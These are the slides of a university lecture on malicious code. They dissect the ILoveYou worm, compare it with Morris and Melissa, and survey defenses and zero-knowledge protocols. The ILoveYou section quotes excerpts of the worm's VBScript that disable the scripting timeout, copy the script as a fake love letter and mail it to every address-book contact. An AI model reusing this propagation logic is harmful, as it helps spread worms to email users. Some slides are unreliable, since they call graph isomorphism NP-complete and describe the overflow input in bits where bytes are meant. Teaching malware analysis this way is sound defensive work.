Lecture 16: Malcode David Evans CS551: Security and Privacy
advertisement
Lecture 16: Malcode From http://cnnfn.cnn.com/2000/10/27/technology/microsoft/ CS551: Security and Privacy University of Virginia Computer Science David Evans http://www.cs.virginia.edu/~evans Menu • Examination of ILoveYou Code • Malicious Code Taxonomy • Malcode Defenses Overview – Virus Scanners • Trick or Treat Protocols 27 July 2016 University of Virginia CS 551 2 LoveLetter.VBS • Excerpts on the manifest • This 328-line program caused ~$10B in damage last Spring • How much work and smarts was required? 27 July 2016 University of Virginia CS 551 3 Smart people would rem barok -loveletter(vbe) <i hate go to school> convey more interesting rem by: spyder / ispyder@mail.com / message. @GRAMMERSoft Group / Manila,Philippines Main Loop On Error Resume Next Smart virus writers ... wscr.RegWrite "...Scripting Host\ don’t include their Settings\Timeout", 0 contact information. sub main() ... Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") ... This was smart – turn of spreadtoemail() scripting timeout in registry. ... end sub (Dumb for Microsoft.) 27 July 2016 University of Virginia CS 551 4 spreadtoemail (edited to fit) sub spreadtoemail() for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) Smart virus writers set male=out.CreateItem(0) can spell “mail”. male.Recipients.Add(malead) male.Subject = “ILOVEYOU” male.Body = “kindly check the attached LOVELETTER coming from me.” male.Attachments.Add(dirsystem& “\LOVE-LETTER-FOR-YOU.TXT.vbs”) male.Send x=x+1 next Smart virus writers next understand for loops. end sub 27 July 2016 University of Virginia CS 551 5 27 July 2016 University of Virginia CS 551 6 Be Very Afraid... • When really dumb people with no resources write malicious programs, it costs $10B. • What would happen if smart people with resources wrote a malicious program? • See manifest links: – Two interesting scenarios answering this – James Gleick article 27 July 2016 University of Virginia CS 551 7 Attacking Malicious Code • “Malicious Code” is a bad name – Code has no intent – Programmer’s intent doesn’t matter, what the code does matters • As networks get more programmable, accidentally harmful code will become common • We’ll use “malcode” (mal = bad) – Its not a great name either... 27 July 2016 University of Virginia CS 551 8 Taxonomy of Code All Code Harmless Code Malcode Created by Malicious Author 27 July 2016 Accidental University of Virginia CS 551 (occasionally programs are actually useful, too) 9 Taxomony of Malcode [Stallings, p. 502] Malcode Requires Host Program Trap Doors Logic Bombs Trojan Horses Independent Viruses Insiders 27 July 2016 Worms Self-Replicating University of Virginia CS 551 10 Worms and Viruses • People get into stupid arguments over whether something is a “worm” or a “virus” – Is the Internet a host program? • See Mark W. Eichin and Jon A. Rochlis, With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988 • Is Outlook a host program for an email? • Similarly, for worms/viruses/Trojans – If the user must open it (e.g., ILoveYou) it is self-replicating? 27 July 2016 University of Virginia CS 551 11 Trojan Horses • Greeks and Trojans at war – Eris (Discord), Paris, Aphroditie, Helen • Greeks attacking Troy, bombarded city for 10 years, but couldn’t get through city walls. • Pretended to leave, left big wooden horse as gift • Trojans brought horse into city (had to tear down part of wall to do this), got silly drunk celebrating victory. • Greeks jumped out, killed sentries, and let in Greek army. 27 July 2016 University of Virginia CS 551 12 Modern Trojan Horses • User runs program that looks harmless – Program pretends to be “cool, dancing bears”, also erases your hard drive • Most attacks today are Trojan Horses – ILoveYou, Melissa, recent Microsoft attack, etc. • Rely on modern humans being as dumb as mythical Trojans – No matter how good your city/fire walls are, they don’t do any good if you can’t stop users from running random code 27 July 2016 University of Virginia CS 551 13 Differences between Morris Worm 1988 and Melissa/ILoveYou 1999 27 July 2016 University of Virginia CS 551 14 Vulnerabilities Exploited • Morris Worm: – Buffer overflow: fingerd uses gets – sendmail debug mode – Weak Unix passwords • Melissa: – Word enables macros by default, no limitations on macro behavior • ILoveYou: – Dumb people will run code attached to email 27 July 2016 University of Virginia CS 551 15 Buffer Overflows int i; int k; Frame Pointer gets (s); Input more than 64 bits: gets just writes down stack bit 65: address of bit 66 on stack bits 66-...: instructions 27 July 2016 ... char s[64]; Return Address University of Virginia CS 551 16 Preventing Buffer Overflows • Use run-time checks on all memory references – Safe languages (CLU, Java, Eiffel, etc.) – Safe libraries for C (don’t use gets, strcpy, etc.) • Separate code and data segments – Make code segment unwriteable (once application loaded), only allow jumps in code segment • Static analysis – Check binary or source code • But – about ½ of recent vulnerabilities are still buffer overflows! 27 July 2016 University of Virginia CS 551 17 Replication Strategy • Morris Worm – Searched .forward files (should have used .rhosts) to find other hosts to attack – Used password guessing to break into other accounts – Used fingerd, sendmail vulnerabilites • Melissa/ILoveYou – Emails itself to entries in victim’s Outlook address book 27 July 2016 University of Virginia CS 551 18 Damage • Morris Worm – Infected ~6000 computers (10% of Internet) • Melissa – Infected 1.2 Million machines in a few hours • ILoveYou – $10 Billion in damage 27 July 2016 University of Virginia CS 551 19 Outcomes • Internet Worm (Robert Morris, Jr.) – Convicted under ... 1986 – 3 years suspended sentence (no jail time), $10,000 fine. – Current occupation • Melissa (David Smith) (~$80m damages) – Plead guilty, Dec 1999 (second successful prosecution of virus author), link to plea agreement on manifest – Hired by Rutgers as Computer Technician while awaiting sentencing • ILoveYou ($10B damages) – Release without penalty, no laws in Philippines 27 July 2016 University of Virginia CS 551 20 Responses • Morris Worm – Disconnect from network – Disorganized, phone • Anonymous message (probably from Robert Morris) explaining how to disable virus was not noticed or distributed – DARPA established CERT • Melissa – CERT Advisory, Eradicated quickly • But CERT had to rebuild Web server • ILoveYou – Many countries have since passed laws, Europe treaty announced last week 27 July 2016 University of Virginia CS 551 21 Malcode Defenses 1. Prevent malcode from running 2. Limit damage it can do 3. Discourage attackers 27 July 2016 University of Virginia CS 551 22 Malcode Defenses 1. Prevent malcode from running Today • 20 Nov • • Virus scanners – recognize known malcode Firewalls – strip malcode from incoming packets Education – make users smarter 2. Limit damage it can do Weds. • • • Sandbox (“Playpen”) – run malcode in protected virtual machine Reference monitors – enforce policy on execution System maintenance 3. Discourage attackers Not in • CS551 • Legal – pass laws to penalize attackers Education 27 July 2016 University of Virginia CS 551 23 Virus Scanners • Compare code to a database of known malicious code – Smart authors create self-mutating viruses • Reasonably useful in days of “sneaker” net (viruses spread on floppies) • Reasonably useless when viruses spread as fast as email 27 July 2016 University of Virginia CS 551 24 Virus Spreading • Read email every hour • Everyone’s address book contains 50 people • Infects 300M people in 6 hours! 350000000 300000000 250000000 200000000 150000000 100000000 50000000 0 1 2 3 4 5 6 (For more complex model, see Wang/Knight/Elder paper on manifest.) 27 July 2016 University of Virginia CS 551 25 How vulnerable are you? http://security1.norton.com/us/intro.asp Scans your computer to see if you have purchased enough Symantec software. Tells you in bright red letters you should buy some. 27 July 2016 University of Virginia CS 551 26 27 July 2016 University of Virginia CS 551 27 What it Should Do • Tell people who run their scanner (which accesses every byte on their disk) without checking its certificate that they are very vulnerable and should get an education! 27 July 2016 University of Virginia CS 551 28 Malcode Summary • Best defense is education • Next best defense is a good offence – Tough legal penalties for convicted attackers – Doesn’t work against motivated foreign governments • Technical defenses next time – But much less effective than these 27 July 2016 University of Virginia CS 551 29 Trick or Treat Protocols 27 July 2016 University of Virginia CS 551 30 Trick or Treat Protocols • All legitimate trick-or-treaters have a magic word that identifies them • Need to prove you know something without revealing it (otherwise you don’t need to give the treat)! • Technical literature calls them “ZeroKnowledge Proofs” 27 July 2016 University of Virginia CS 551 31 Cave Protocol • Victor stands at 1 • Peggy enters cave and walks to either 3 or 4 • Victor moves to 2 • Victor yells to Peggy to come out either left or right • Repeat n times 1 2 Magic word door 3 4 Peggy must know Quisquater and Guillou, CRYPTO ’89 magic word to open Can Victor convince Colleen that Peggy door. knows magic word? 27 July 2016 University of Virginia CS 551 32 If there’s no cave handy... 1. Peggy uses her secret and random number to transform original problem into an isomorphic hard problem. 2. Peggy commits the solution (using hash function). 3. Peggy reveals new problem. 4. Victor asks Peggy to either: a) Prove new problem is isomorphic to old one b) Show the solution to the new problem 5. Repeat n times. 27 July 2016 University of Virginia CS 551 33 Making an isomorphic hard problem • Requirements: – Can’t use solution to new problem to solve old problem (without knowing mapping) – Can’t easily solve new problem – Can show that old problem and new problem are equivalent • Hmmm...any theory experts? 27 July 2016 University of Virginia CS 551 34 Graph Isomoprhism • Given two graphs, G1 = <V1, E1> and G2 = <V2, E2> is there a mapping between V1 and V2 such that G1 and G2 are identical? • This is an NP-complete problem: – Its hard to find the mapping. – Given mapping, easy to check it is correct. 27 July 2016 University of Virginia CS 551 35 Using Graph Isomorphism • Peggy constructs a graph to represent the magic word: – Vertices are letters – Chooses edges as necessary – Hamiltonian cycle is magic word (path that goes through each vertex exactly once) – Finding a Hamiltonian cycle is NPcomplete 27 July 2016 University of Virginia CS 551 36 Trick or Treat • Peggy shows Victor G, but not the cycle • Peggy creates H isomorphic to G – Since she creates it, easy to find Hamiltonian cycle and isomorphism • Victor as for either: – Map showing G and H are isomorphic – Hamiltonian cycle for H • Repeat n times (different H each time) 27 July 2016 University of Virginia CS 551 37 Charge • Keep cracking on your projects! • Go forth and educate! • Ask your trick-or-treaters for Hamiltonian cycles and graph isomorphisms (and keep the candy for yourself) • Next time: Malicious code defenses 27 July 2016 University of Virginia CS 551 38
